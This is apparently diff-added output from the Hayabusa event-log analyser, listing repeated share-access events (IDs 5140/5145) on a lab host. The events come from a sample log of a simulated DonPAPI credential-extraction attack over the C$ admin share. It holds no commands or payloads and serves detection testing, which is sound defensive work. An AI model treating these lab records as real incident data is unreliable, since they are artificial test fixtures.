+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
